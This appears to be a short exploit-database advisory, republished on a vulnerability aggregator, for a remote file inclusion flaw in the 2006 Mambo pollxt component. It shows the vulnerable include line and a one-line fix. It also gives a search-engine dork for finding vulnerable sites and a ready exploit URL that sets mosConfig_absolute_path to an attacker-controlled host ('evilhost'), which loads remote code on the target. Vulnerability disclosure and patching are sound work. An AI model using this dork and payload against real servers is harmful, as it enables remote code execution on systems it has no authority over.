Lucene search
+L

Mambo Component pollxt 1.22.07 - Remote File Inclusion

🗓️ 17 Jul 2006 00:00:00Reported by vituxType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

Mambo Component pollxt 1.22.07 Remote File Inclusio

Related
Code
Application : pollxt mambo Component

URL : http://www.mamboxt.com

Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on
in components/com_pollxt/conf.pollxt.php on line 1-2

require_once($mosConfig_absolute_path."/administrator/components/com_pollxt/pollxt.class.php");

Exploit:
~~~~~~~~

dork: inurl:"com_pollxt"

http://www.vuln.com/components/com_pollxt/conf.pollxt.php?mosConfig_absol
ute_path=http://evilhost

Fix
~~~~

Add before code:
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

vitux

# milw0rm.com [2006-07-17]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jul 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.05557
48